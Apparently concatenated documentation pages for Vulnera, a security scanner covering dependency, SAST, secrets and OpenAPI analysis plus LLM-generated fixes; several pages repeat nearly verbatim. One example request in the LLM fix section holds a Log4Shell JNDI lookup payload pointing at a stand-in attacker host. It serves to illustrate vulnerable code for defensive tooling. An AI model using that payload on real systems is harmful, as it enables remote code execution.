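# Hand-written, simplified npm lockfile fragment (real ones nest deeper)
cat > package-lock.json <<'EOF'
{
  "dependencies": {
    "lodash": { "version": "4.17.15" },
    "minimist": { "version": "1.2.5" }
  }
}
EOF

# Every package arrives with an exact pinned version
PINS=$(sed -n 's/ *"\([A-Za-z0-9.-]*\)": { "version": "\([^"]*\)".*/\1@\2/p' package-lock.json)
echo "$PINS"
```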

Features

  • Directed dependency graph with reachability analysis
  • Concurrent vulnerability lookups with configurable limits
  • Safe version recommendations with patch/minor/major impact classification
  • CWE normalization and filtering
  • Advisory intelligence via vulnera-advisor

Detail Levels

| Level | Best For | Includes |
|---|---|---|
| minimal | Status badges | Vulnerabilities list, basic metadata |
| standard | Inline decorations, quick fixes | Vulnerabilities, packages, version recommendations |
| full | Detailed reports, dependency trees | All data + dependency graph |

Output Example

{
  "package": "lodash",
  "current_version": "4.17.15",
  "vulnerability": "CVE-2021-23337",
  "recommendations": {
    "nearest_safe": "4.17.21",
    "latest_safe": "4.17.21",
    "upgrade_impact": "patch"
  }
}
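
nearest_safe can be thought of as the smallest advisory-free version above the current one. A sketch of that selection using version sort (the safe-version list is illustrative; requires sort -V, as in GNU coreutils):

```shell
CURRENT="4.17.15"
SAFE="4.17.21 5.0.0"   # versions with no known advisories (illustrative)

# Version-sort current + safe versions, then take the entry right after current
NEAREST=$(printf '%s\n' $SAFE "$CURRENT" | sort -V |
  awk -v c="$CURRENT" 'f { print; exit } $0 == c { f = 1 }')
echo "nearest_safe=$NEAREST"
```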

CLI Usage

Dependency analysis runs via vulnera deps (online only):

# Basic scan
vulnera deps .

# Include transitive dependencies
vulnera deps . --include-transitive

# Force rescan (ignore local cache)
vulnera deps . --force-rescan

Next Steps

SAST Module (Static Application Security Testing)

The SAST module performs offline, multi-language static analysis using Tree-sitter parsing, optional OXC frontend for JS/TS, and inter-procedural taint analysis with call-graph support.

Overview

SAST analyzes source code to detect security flaws such as injection, insecure crypto, unsafe deserialization, and risky unsafe usage patterns. It emits findings in Vulnera’s unified schema and supports SARIF output.

Supported Languages

| Language | Parser | File Extensions |
|---|---|---|
| Python | tree-sitter-python | .py |
| JavaScript | tree-sitter-javascript / OXC | .js |
| TypeScript | tree-sitter-javascript / OXC | .ts |
| Rust | tree-sitter-rust | .rs |
| Go | tree-sitter-go | .go |
| C | tree-sitter-c | .c, .h |
| C++ | tree-sitter-cpp | .cpp, .cc, .hpp |

Note: JSX/TSX files are not scanned.

Pipeline (High-Level)

  1. Discovery — Walks files and maps them to supported languages.
  2. Parsing — Builds ASTs with Tree-sitter; optional OXC for JS/TS.
  3. Rule matching — Applies TOML rule packs to AST patterns.
  4. Taint analysis — Tracks source → sink flow across functions and files.
  5. Call graph — Resolves cross-file calls to expand reachability.
  6. Post-process — Dedupes, scores severity/confidence, emits findings.
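Conceptually, the taint step marks values produced by untrusted sources and reports when they reach a dangerous sink without passing a sanitizer. A toy Python illustration of that idea (a conceptual sketch, not Vulnera's engine; the function names are made up):

```python
SOURCES = {"read_input"}   # functions that produce tainted data
SINKS = {"exec_sql"}       # functions that must not receive tainted data
SANITIZERS = {"escape"}    # functions whose result is considered clean

def find_taint_flows(steps):
    """Return sink calls that receive tainted data. steps: (func, dst, src)."""
    tainted = set()
    findings = []
    for func, dst, src in steps:
        if func in SOURCES:
            tainted.add(dst)            # dst = read_input()
        elif func in SANITIZERS:
            tainted.discard(dst)        # sanitized result is clean
        elif func == "assign":
            if src in tainted:
                tainted.add(dst)        # taint propagates through assignment
        elif func in SINKS and src in tainted:
            findings.append((func, src))
    return findings

steps = [
    ("read_input", "user", None),   # user = read_input()   (source)
    ("assign", "query", "user"),    # query = user          (propagation)
    ("exec_sql", None, "query"),    # exec_sql(query)       (tainted sink!)
]
print(find_taint_flows(steps))  # [('exec_sql', 'query')]
```

The real engine does this over ASTs and a cross-file call graph rather than a flat step list.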

Rule System

SAST rules are TOML-based and embedded at build time. Optional Git-based rule packs can be configured.

Rule locations:

  • vulnera-sast/rules/*.toml — core rule packs
  • vulnera-sast/taint-patterns/*.toml — taint sources/sinks/sanitizers
  • vulnera-sast/tests/fixtures/ — CVE fixtures for quality gates

Analysis Depth (SAST)

Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):

Depth | Description
--- | ---
quick | Pattern matching only (no data-flow analysis)
standard | Patterns + intra-procedural data flow
deep | Full analysis (patterns + data flow + call graph + inter-procedural)

Dynamic depth adjustment is enabled by default to keep large repos within time budgets.

CLI Usage (Actual Flags)

# Basic scan
vulnera sast .

# Severity filter
vulnera sast . --min-severity high

# Only changed files (git required)
vulnera sast . --changed-only

# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"

Available flags:

  • --min-severity <critical|high|medium|low>
  • --fail-on-vuln
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --languages <lang1,lang2,...> (override auto-detection)
  • --rules <category1,category2,...> (rule categories)
  • --no-cache (disable incremental cache)
  • --watch (continuous scanning)
  • --fix (LLM-powered bulk fixes; requires online + auth + quota)
  • --baseline <path> (baseline file for diff)
  • --save-baseline (save current findings to baseline)
  • --only-new (report only findings not in baseline)

Configuration

Configured via vulnera_core::config::SastConfig and AnalysisConfig.

Key settings:

  • analysis_depth = "quick|standard|deep"
  • js_ts_frontend = "oxc_preferred" | "tree_sitter"
  • enable_data_flow, enable_call_graph
  • enable_ast_cache, ast_cache_ttl_hours
  • dynamic_depth_enabled, file/size thresholds
  • min_finding_severity, min_finding_confidence
  • rule_packs and rule_pack_allowlist

Example (TOML):

[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"

Output

Findings include:

  • severity and confidence
  • location (path + line/column)
  • optional snippet and semantic_path (taint trace)

SARIF output:

vulnera sast . --format sarif > report.sarif
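SARIF is plain JSON, so the report can be post-processed with standard tooling. A small sketch that counts results by level in a SARIF 2.1.0 file (field names per the SARIF spec, not a Vulnera-specific schema):

```python
import json
from collections import Counter

def count_by_level(sarif_text: str) -> Counter:
    """Count SARIF results by their 'level' (error/warning/note)."""
    doc = json.loads(sarif_text)
    levels = Counter()
    for run in doc.get("runs", []):
        for result in run.get("results", []):
            # SARIF defaults a missing level to "warning"
            levels[result.get("level", "warning")] += 1
    return levels

sample = '{"version": "2.1.0", "runs": [{"results": [{"level": "error"}, {"level": "warning"}, {}]}]}'
print(count_by_level(sample))  # error: 1, warning: 2
```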

Quality Gates

Fixture-based accuracy thresholds are enforced in CI (from config/default.toml):

  • Precision: ≥ 0.70
  • Recall: ≥ 0.50
  • Unique CWE coverage: ≥ 12
  • Languages with fixtures: ≥ 7

Limitations

  • Tree-sitter is syntax-level; no macro expansion or full type resolution.
  • Runtime behavior and dynamic code generation are out of scope.
  • JSX/TSX files are excluded.

Next Steps

SAST (Static Application Security Testing)

Vulnera SAST detects security issues in source code using Tree-sitter parsing, a call-graph builder, and inter-procedural taint analysis. It is fully offline and runs locally.

What It Detects

Common categories include:

  • SQL injection and command injection
  • XSS and HTML injection
  • Unsafe deserialization and dynamic code execution
  • Insecure crypto and weak randomness
  • Path traversal and file disclosure
  • Risky unsafe-block usage patterns (Rust)

How It Works

Pipeline overview:

  1. Discovery — Walks the project and maps files to supported languages.
  2. Parsing — Builds syntax trees using Tree-sitter (with OXC for JS/TS when enabled).
  3. Rule matching — Applies TOML rule packs to AST patterns.
  4. Taint analysis — Tracks source → sink flow, intra- and inter-procedural.
  5. Call graph — Resolves function calls across files to expand taint reachability.
  6. Post-process — Dedupes, scores confidence/severity, emits unified findings.

Supported Languages

Language | Parser | File Extensions
--- | --- | ---
Python | tree-sitter-python | .py
JavaScript | tree-sitter-javascript / OXC | .js
TypeScript | tree-sitter-javascript / OXC | .ts
Rust | tree-sitter-rust | .rs
Go | tree-sitter-go | .go
C | tree-sitter-c | .c, .h
C++ | tree-sitter-cpp | .cpp, .cc, .hpp

Note: JSX/TSX files are not scanned.

Analysis Depth (SAST)

Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):

Depth | Description
--- | ---
quick | Pattern matching only (no data-flow analysis)
standard | Patterns + intra-procedural data flow
deep | Full analysis (patterns + data flow + call graph + inter-procedural)

Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable with VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.
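The downgrade decision can be pictured as a simple threshold check. The sketch below is purely illustrative; the threshold value is made up and is not Vulnera's actual default:

```python
def effective_depth(requested: str, file_count: int,
                    downgrade_threshold: int = 5000) -> str:
    """Downgrade 'deep' scans on large repos to stay within time budgets.
    The 5000-file threshold is an example value, not Vulnera's default."""
    if requested == "deep" and file_count > downgrade_threshold:
        return "standard"
    return requested

print(effective_depth("deep", 12000))  # standard
print(effective_depth("deep", 300))    # deep
```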

Rule System

Rules are TOML-based and embedded at build time. You can optionally load Git-based rule packs.

Locations:

  • vulnera-sast/rules/*.toml — core rule packs
  • vulnera-sast/taint-patterns/*.toml — taint sources/sinks/sanitizers
  • vulnera-sast/tests/fixtures/ — CVE fixtures for quality gates

CLI Usage (Actual Flags)

SAST runs via vulnera sast:

# Basic scan
vulnera sast .

# Severity filter
vulnera sast . --min-severity high

# Only changed files (git required)
vulnera sast . --changed-only

# Explicit file list
vulnera sast . --files src/main.rs,src/lib.rs

# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"

Available flags:

  • --min-severity <critical|high|medium|low>
  • --fail-on-vuln
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --languages <lang1,lang2,...> (override auto-detection)
  • --rules <category1,category2,...> (rule categories)
  • --no-cache (disable incremental cache)
  • --watch (continuous scanning)
  • --fix (LLM-powered bulk fixes; requires online + auth + quota)
  • --baseline <path> (baseline file for diff)
  • --save-baseline (save current findings to baseline)
  • --only-new (report only findings not in baseline)

Output

SAST findings are emitted in the unified finding schema:

  • severity and confidence
  • location (path + line/column)
  • optional snippet and semantic_path (taint trace)

You can emit SARIF:

vulnera sast . --format sarif > report.sarif

Configuration (Server + Library)

The SAST engine is configured via vulnera_core::config::SastConfig and AnalysisConfig.

Key settings:

  • analysis_depth = "quick|standard|deep"
  • js_ts_frontend = "oxc_preferred" | "tree_sitter"
  • enable_data_flow, enable_call_graph
  • enable_ast_cache, ast_cache_ttl_hours
  • dynamic_depth_enabled, file/size thresholds
  • min_finding_severity, min_finding_confidence
  • rule_packs and rule_pack_allowlist

Example (TOML):

[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"

Offline Guarantees

SAST runs fully offline:

  • No network calls
  • All rule packs embedded unless you configure external rule packs

Quality Gates

The SAST module ships with a fixture-based accuracy harness enforced in CI.

Thresholds (from config/default.toml):

  • Precision: ≥ 0.70
  • Recall: ≥ 0.50
  • Unique CWE coverage: ≥ 12
  • Languages with fixtures: ≥ 7

Limitations

  • Tree-sitter is syntax-level; no macro expansion or full type resolution.
  • Dynamic code generation and runtime behavior are out of scope.
  • JSX/TSX files are excluded.

Next Steps

Secrets Detection Module

The Secrets Detection module finds hardcoded credentials and sensitive tokens in source code using regex-based rules and entropy heuristics. It runs fully offline by default, with optional online verification for select providers.


Detection Methods

Method | Description | Offline
--- | --- | ---
Regex rules | Known secret patterns with context keywords | ✅ Yes
Entropy | High-entropy token detection (Base64/hex/generic) | ✅ Yes
Verification | Optional provider checks (AWS/GitHub/GitLab) | ❌ No

Supported Secret Types

Examples include:

  • Cloud credentials (AWS, Azure, GCP)
  • API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
  • OAuth/JWT/Bearer tokens
  • Database connection strings and passwords
  • Private keys (RSA/EC/PGP/SSH)
  • High-entropy strings (Base64/hex/generic tokens)

How It Works

  1. Discovery — Walks files within the scan root.
  2. Regex rules — Applies built-in secret patterns.
  3. Entropy detection — Flags high-entropy strings using thresholds.
  4. Optional verification — Provider-specific checks (disabled by default).
  5. Post-process — Dedupes and emits unified findings.

CLI Usage (Actual Flags)

Secrets detection runs via vulnera secrets:

# Basic scan
vulnera secrets .

# Only changed files (git required)
vulnera secrets . --changed-only

# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs

# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"

# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy

Available flags:

  • --fail-on-secret
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --include-tests
  • --include-entropy
  • --no-cache
  • --watch

Output

Secrets findings follow the unified finding schema:

  • secret_metadata is populated
  • vulnerability_metadata may be empty
  • enrichment is optional (LLM)

You can emit SARIF:

vulnera secrets . --format sarif > report.sarif

Configuration (Server + Library)

Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.

Key settings:

  • enable_entropy_detection
  • base64_entropy_threshold, hex_entropy_threshold
  • exclude_patterns, exclude_extensions
  • baseline_file_path, update_baseline
  • scan_git_history, max_commits_to_scan
  • enable_verification (default: false)

Example (TOML):

[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false
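The entropy thresholds refer to Shannon entropy in bits per character: random Base64 material approaches 6 bits, while English text and repeated characters score far lower. A quick way to compute it (the standard formula, not Vulnera's code):

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Shannon entropy of a string, in bits per character."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

print(shannon_entropy("aaaabbbb"))          # 1.0 (two symbols, even split)
print(shannon_entropy("0123456789abcdef"))  # 4.0 (sixteen distinct symbols)
# A long random Base64 token would typically score above the 4.5
# base64_entropy_threshold configured above; prose rarely does.
```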

Offline Guarantees

Secrets detection runs fully offline by default:

  • No network calls
  • Regex rules and entropy heuristics are local
  • Verification is opt-in and requires network access

Limitations

  • Entropy detection can surface false positives in test fixtures and generated tokens.
  • Markdown and certain doc extensions are excluded by default unless explicitly included.
  • Verification is limited to supported providers.

Next Steps

Secrets Detection

Vulnera Secrets detects hardcoded credentials and sensitive tokens using regex-based rules and entropy heuristics. It runs fully offline by default, with optional provider verification.

What It Detects

Common categories include:

  • Cloud credentials (AWS, Azure, GCP)
  • API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
  • OAuth/JWT/Bearer tokens
  • Database connection strings and passwords
  • Private keys (RSA/EC/PGP/SSH)
  • High-entropy strings (Base64/hex/generic tokens)

How It Works

Pipeline overview:

  1. Discovery — Walks files within the scan root.
  2. Regex rules — Applies built-in secret patterns (rule pack).
  3. Entropy detection — Flags high-entropy strings (Base64/hex + generic heuristics).
  4. Optional verification — Provider-specific verification (disabled by default).
  5. Post-process — Dedupes and emits unified findings.

Detection Methods

Method | Description | Offline
--- | --- | ---
Regex rules | Known secret patterns with context keywords | ✅ Yes
Entropy | High-entropy token detection (Base64/hex/generic) | ✅ Yes
Verification | Optional provider checks (AWS/GitHub/GitLab) | ❌ No

CLI Usage (Actual Flags)

Secrets detection runs via vulnera secrets:

# Basic scan
vulnera secrets .

# Only changed files (git required)
vulnera secrets . --changed-only

# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs

# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"

# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy

Available flags:

  • --fail-on-secret
  • --changed-only
  • --files <path1,path2,...>
  • --exclude <glob1,glob2,...>
  • --include-tests
  • --include-entropy
  • --no-cache
  • --watch

Output

Secrets findings follow the unified finding schema. For secret findings:

  • secret_metadata is populated
  • vulnerability_metadata may be empty
  • enrichment is optional (LLM)

You can emit SARIF:

vulnera secrets . --format sarif > report.sarif

Configuration (Server + Library)

Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.

Key settings:

  • enable_entropy_detection
  • base64_entropy_threshold, hex_entropy_threshold
  • exclude_patterns, exclude_extensions
  • baseline_file_path, update_baseline
  • scan_git_history, max_commits_to_scan
  • enable_verification (default: false)

Example (TOML):

[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false
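The baseline settings support a diff workflow: record known findings once, then report only new ones. Mechanically this is a set difference over stable fingerprints; a hedged sketch (the fingerprint scheme here is hypothetical, not Vulnera's baseline format):

```python
def fingerprint(finding: dict) -> tuple:
    """Hypothetical stable key: rule id + file path + hash of matched value."""
    return (finding["rule"], finding["path"], hash(finding["match"]))

def only_new(findings: list, baseline: list) -> list:
    """Return findings whose fingerprint is absent from the baseline."""
    known = {fingerprint(f) for f in baseline}
    return [f for f in findings if fingerprint(f) not in known]

baseline = [{"rule": "aws-key", "path": "config.py", "match": "AKIAEXAMPLE"}]
current = baseline + [{"rule": "github-pat", "path": "ci.yml", "match": "ghp_example"}]
print(only_new(current, baseline))  # only the github-pat finding
```

Keying on the matched value (rather than line numbers) keeps fingerprints stable as files are edited.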

Offline Guarantees

Secrets detection runs fully offline by default:

  • No network calls
  • Regex rules and entropy heuristics are local
  • Verification is opt-in and requires network access

Limitations

  • Entropy detection can surface false positives in test fixtures and generated tokens.
  • Markdown and certain doc extensions are excluded by default unless explicitly included.
  • Verification is limited to supported providers.

Next Steps

API Security

The API Security module analyzes OpenAPI 3.x specifications to identify security vulnerabilities and design misconfigurations before deployment. It runs fully offline and is triggered when an OpenAPI spec is detected (or explicitly provided).

Supported Specifications

  • OpenAPI 3.0
  • OpenAPI 3.1

Analyzer Categories (Actual)

These analyzers run on the parsed OpenAPI spec:

  • Authentication — missing auth, weak schemes (e.g., basic), insecure auth usage
  • Authorization — missing authorization checks, overly permissive access
  • Input Validation — missing request validation, unsafe parameter shapes
  • Data Exposure — sensitive data in URLs/headers, response overexposure
  • Security Headers — missing CSP/HSTS/XFO/XCTO; CORS review
  • OAuth/OIDC — insecure flows, redirect issues, token validation gaps
  • Design — versioning and error-handling issues
  • Security Misconfiguration — insecure defaults and configuration pitfalls
  • Resource Restriction — missing request size/limit constraints

Notable Checks

  • CORS wildcard detection: Access-Control-Allow-Origin: * is flagged as high severity.
  • Missing security headers: required headers are validated per response.
  • Missing authentication: endpoints with no security requirements are flagged.
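The missing-authentication check reduces to walking each operation and verifying that a security requirement applies either globally or at the operation level. A conceptual sketch over a parsed spec dict (not the module's implementation; OpenAPI semantics per the spec, where an explicit empty security list disables auth):

```python
HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options"}

def unauthenticated_operations(spec: dict) -> list:
    """List (path, method) pairs with no effective security requirement."""
    global_security = spec.get("security", [])
    flagged = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method not in HTTP_METHODS:
                continue
            # Operation-level 'security' overrides the global list;
            # an explicit [] disables auth for that operation.
            effective = op.get("security", global_security)
            if not effective:
                flagged.append((path, method))
    return flagged

spec = {
    "security": [{"api_key": []}],
    "paths": {
        "/users": {"get": {}},                 # inherits global auth
        "/health": {"get": {"security": []}},  # explicitly open
    },
}
print(unauthenticated_operations(spec))  # [('/health', 'get')]
```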

Configuration

The module is configured via vulnera_core::config::ApiSecurityConfig.

Key settings

  • enabled_analyzers: list of analyzers to run (empty = all)
  • severity_overrides: map of vulnerability type → severity
  • exclude_paths: skip specific API paths
  • strict_mode: more aggressive checks

Example (TOML)

[api_security]
enabled_analyzers = ["authentication", "authorization", "input_validation", "security_headers"]
exclude_paths = ["/health", "/metrics"]
strict_mode = true

[api_security.severity_overrides]
"missing_authentication" = "high"
"insecure_cors" = "high"

CLI Usage

Analyze a spec directly using the CLI:

# Auto-detect spec in a directory
vulnera api .

# Analyze an explicit spec file
vulnera api . --spec ./openapi.yaml

Relevant flags:

  • --spec <path> — explicit OpenAPI spec path
  • --min-severity <critical|high|medium|low>
  • --fail-on-issue
  • --framework <name> (optional)

Output

Findings are emitted in the unified finding schema with:

  • severity and confidence
  • location (path + operation)
  • description and recommendation

SARIF output is supported:

vulnera api . --format sarif > report.sarif

Limitations

  • Relies on the spec as the source of truth — runtime behavior is out of scope.
  • Missing or incomplete specs will limit detection.

Next Steps

LLM Features (Explanations, Fixes, Queries)

Vulnera’s LLM features are post-processing only. Detection is performed by SAST, Secrets, API Security, and Dependency Analysis modules; LLMs are used to explain findings and propose fixes after the scan. LLM calls require network access and valid provider credentials.


What’s Available

1) Explain a Vulnerability (API)

Endpoint:

  • POST /api/v1/llm/explain

Request (example):

{
  "vulnerability_id": "CVE-2021-44228",
  "description": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
  "affected_component": "org.apache.logging.log4j:log4j-core",
  "audience": "technical"
}

Response (example):

{
  "explanation": "This vulnerability allows remote code execution because ...",
  "key_points": ["Remote Code Execution", "JNDI Injection", "Critical Severity"],
  "mitigation_steps": ["Upgrade to version 2.15.0", "Disable JNDI lookup"]
}
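A client call to the explain endpoint is a plain authenticated POST. The sketch below only builds the request; the base URL is a placeholder, and the X-API-Key header follows the API-key scheme documented for the server:

```python
import json

BASE_URL = "https://vulnera.example.com"  # placeholder, not a real deployment

def build_explain_request(api_key: str, vuln_id: str, description: str,
                          component: str, audience: str = "technical"):
    """Assemble URL, headers, and body for POST /api/v1/llm/explain."""
    url = f"{BASE_URL}/api/v1/llm/explain"
    headers = {"X-API-Key": api_key, "Content-Type": "application/json"}
    body = {
        "vulnerability_id": vuln_id,
        "description": description,
        "affected_component": component,
        "audience": audience,
    }
    return url, headers, json.dumps(body)

url, headers, payload = build_explain_request(
    "my-key", "CVE-2021-44228",
    "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
    "org.apache.logging.log4j:log4j-core",
)
# Send with any HTTP client, e.g. requests.post(url, headers=headers, data=payload)
```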

2) Generate a Code Fix (API)

Endpoint:

  • POST /api/v1/llm/fix

Request (example):

{
  "vulnerability_id": "CVE-2021-44228",
  "vulnerable_code": "logger.error(\"${jndi:ldap://attacker.com/a}\");",
  "language": "java",
  "context": "src/main/java/com/example/App.java"
}

Response (example):

{
  "fixed_code": "logger.error(\"User input: {}\", sanitizedInput);",
  "explanation": "Replaced direct string concatenation with parameterized logging.",
  "confidence": 0.95
}

3) Natural Language Query (API)

Endpoint:

  • POST /api/v1/llm/query

Request (example):

{
  "query": "How do I fix the SQL injection in login.php?",
  "context": { "file": "login.php", "content": "..." }
}

Response (example):

{
  "answer": "Use prepared statements and parameterized queries...",
  "references": ["https://owasp.org/www-community/attacks/SQL_Injection"]
}

4) Enrich Job Findings (API)

Endpoint:

  • POST /api/v1/jobs/{job_id}/enrich

Request (example):

{
  "finding_ids": ["finding_123", "finding_456"],
  "code_contexts": {
    "finding_123": "def login(user, password):\n    query = f\"SELECT * FROM users WHERE user='{user}'\""
  }
}

Response (example):

{
  "job_id": "550e8400-e29b-41d4-a716-446655440000",
  "enriched_count": 5,
  "failed_count": 1,
  "findings": [
    { "id": "finding_123", "severity": "Critical", "description": "SQL Injection...", "location": "src/auth.py:42:10", "explanation": "...", "remediation_suggestion": "Use parameterized queries..." }
  ]
}

CLI Support

Generate a Fix (CLI)

Command:

  • vulnera generate-fix

Usage:

vulnera generate-fix \
  --vulnerability CVE-2021-44228 \
  --code src/main/java/com/example/App.java \
  --line 42

Notes:

  • Requires online mode, authentication, and available quota.
  • If offline, unauthenticated, or quota exceeded, the command exits with an error code.

Bulk SAST Fix Suggestions (CLI)

Command:

  • vulnera sast --fix

Usage:

vulnera sast . --fix

Notes:

  • Runs SAST locally, then uses the server for LLM-powered fix suggestions.
  • Requires online mode and authentication.

Provider Configuration

LLM providers are configured via vulnera_core::config::LlmConfig and environment variables.

Provider Selection

  • VULNERA__LLM__PROVIDER = google_ai | openai | azure
  • VULNERA__LLM__DEFAULT_MODEL
  • VULNERA__LLM__TEMPERATURE
  • VULNERA__LLM__MAX_TOKENS
  • VULNERA__LLM__TIMEOUT_SECONDS
  • VULNERA__LLM__ENABLE_STREAMING

Google AI (Gemini)

  • GOOGLE_AI_KEY
  • VULNERA__LLM__GOOGLE_AI__BASE_URL

OpenAI

  • OPENAI_API_KEY
  • VULNERA__LLM__OPENAI__BASE_URL
  • VULNERA__LLM__OPENAI__ORGANIZATION_ID

Azure OpenAI

  • AZURE_OPENAI_KEY
  • VULNERA__LLM__AZURE__ENDPOINT
  • VULNERA__LLM__AZURE__DEPLOYMENT
  • VULNERA__LLM__AZURE__API_VERSION

Quota and Cost

LLM operations are higher-cost than standard analysis:

  • Analysis: 3 tokens
  • LLM (explain/fix/query): 6 tokens

Use LLM sparingly for high-severity findings, and prefer batch enrichment for efficiency.


Troubleshooting

LLM requests fail in offline mode: LLM features require network access. Remove --offline and ensure the server is reachable.

Authentication required: Run vulnera auth login or set VULNERA_API_KEY.

Quota exceeded: Check vulnera quota and reduce LLM usage or wait for reset.


Next Steps

Web Dashboard (API-First Guidance)

Vulnera is API-first and does not ship a bundled web UI in this repository. If you need a dashboard, use the API endpoints below to build your own UI or integrate with existing tools.


Core API Endpoints

Health & Docs

  • GET /health — service health
  • GET /metrics — metrics endpoint
  • GET /docs — Swagger UI (if enabled)
  • GET /api-docs/openapi.json — OpenAPI spec

Jobs & Analysis

  • POST /api/v1/analyze/job — create analysis job
  • GET /api/v1/jobs/{id} — get job status/result

Organizations

  • POST /api/v1/organizations — create organization
  • GET /api/v1/organizations — list organizations
  • GET /api/v1/organizations/{id} — organization details
  • PUT /api/v1/organizations/{id} — update organization
  • DELETE /api/v1/organizations/{id} — delete organization
  • GET /api/v1/organizations/{id}/members — list members
  • POST /api/v1/organizations/{id}/members — invite member
  • DELETE /api/v1/organizations/{id}/members/{user_id} — remove member
  • POST /api/v1/organizations/{id}/leave — leave organization
  • POST /api/v1/organizations/{id}/transfer — transfer ownership

Analytics & Quota

  • GET /api/v1/organizations/{id}/analytics/dashboard — org dashboard stats
  • GET /api/v1/organizations/{id}/analytics/usage — org usage
  • GET /api/v1/organizations/{id}/analytics/quota — org quota
  • GET /api/v1/me/analytics/dashboard — personal dashboard stats
  • GET /api/v1/me/analytics/usage — personal usage
  • GET /api/v1/quota — quota usage

LLM Features (Optional)

  • POST /api/v1/llm/explain
  • POST /api/v1/llm/fix
  • POST /api/v1/llm/query
  • POST /api/v1/jobs/{job_id}/enrich

Authentication & Security

  • Cookie auth uses JWT + CSRF.
  • API key auth uses X-API-Key header.
  • CORS must be configured for your UI origin.
  • Swagger UI can be disabled in production via config.

Building Your Own Dashboard

A minimal dashboard typically includes:

  1. Organization selector
  2. Recent jobs list (/organizations/{id}/analytics/dashboard)
  3. Findings view (from job detail: /jobs/{id})
  4. Quota widget (/organizations/{id}/analytics/quota or /api/v1/quota)
  5. Usage charts (/organizations/{id}/analytics/usage)
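Composing those endpoints into one view is a matter of a few authenticated GETs. A sketch with the HTTP layer stubbed out (endpoint paths from the list above; the fetch callable is a placeholder for a real client):

```python
def build_dashboard(org_id: str, fetch) -> dict:
    """Aggregate the per-organization endpoints into one view model.
    `fetch` is any callable that GETs a path and returns parsed JSON."""
    return {
        "stats": fetch(f"/api/v1/organizations/{org_id}/analytics/dashboard"),
        "quota": fetch(f"/api/v1/organizations/{org_id}/analytics/quota"),
        "usage": fetch(f"/api/v1/organizations/{org_id}/analytics/usage"),
    }

# Example with a fake fetcher standing in for a real HTTP client:
fake_api = {
    "/api/v1/organizations/org1/analytics/dashboard": {"recent_jobs": 3},
    "/api/v1/organizations/org1/analytics/quota": {"used": 850, "limit": 1000},
    "/api/v1/organizations/org1/analytics/usage": {"months": 6},
}
view = build_dashboard("org1", fake_api.get)
print(view["quota"])  # {'used': 850, 'limit': 1000}
```

Keeping the fetcher injectable makes the aggregation trivially testable without a running server.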

Configuration Reference

See:


Next Steps

Organization Management Guide

Organizations in Vulnera enable team collaboration with shared quotas, centralized reporting, and role-based access control. This guide covers everything you need to manage your organization effectively.

Creating an Organization

Step-by-Step Setup

  1. Navigate to Organization Creation

    • Click + New Organization in the sidebar
    • Or go to Dashboard → Organizations → Create New
  2. Fill in Organization Details

    • Organization Name — Your company or team name (e.g., “Acme Security Team”)
    • Description — Brief description of the organization’s purpose
    • Logo — Optional: Upload organization logo (PNG, JPG, 512×512px recommended)
    • Contact Email — Primary contact for billing and notifications
  3. Select Plan Tier

    • Free — 48 tokens/month, up to 5 members, basic integrations
    • Pro — 1000 tokens/month, unlimited members, advanced integrations
    • Enterprise — Custom tokens, SSO/SAML, custom domains, priority support
  4. Confirm Creation

    • Review settings
    • Click Create Organization
    • You’re automatically made Owner and Organization Admin

Post-Creation Setup Checklist

  • Upload organization logo
  • Add organization description
  • Set up billing (if on paid plan)
  • Invite team members
  • Generate API key
  • Configure integrations
  • Set notification preferences

Organization Roles & Permissions

Role Hierarchy

Owner
  ↓ (can delegate to)
Admin
  ↓ (can delegate to)
Member
Viewer (read-only)

Detailed Permissions Matrix

Permissions are grouped by category below (roles, from most to least privileged: Owner, Admin, Member, Viewer):

Scans
  • Create scans
  • View scans
  • Delete scans
  • Export scan results

Findings
  • View findings
  • Resolve findings
  • Mark false positive

Organization Settings
  • View settings
  • Modify general info
  • Manage members
  • Manage API keys

Billing & Subscriptions
  • View billing
  • Manage billing
  • Upgrade plan

Integrations
  • View integrations
  • Configure integrations
  • Manage webhooks

Audit & Compliance
  • View audit logs
  • Export organization data
  • Delete organization

When to Use Each Role

  • Owner — Organization founders, ultimate decision-makers, billing contact

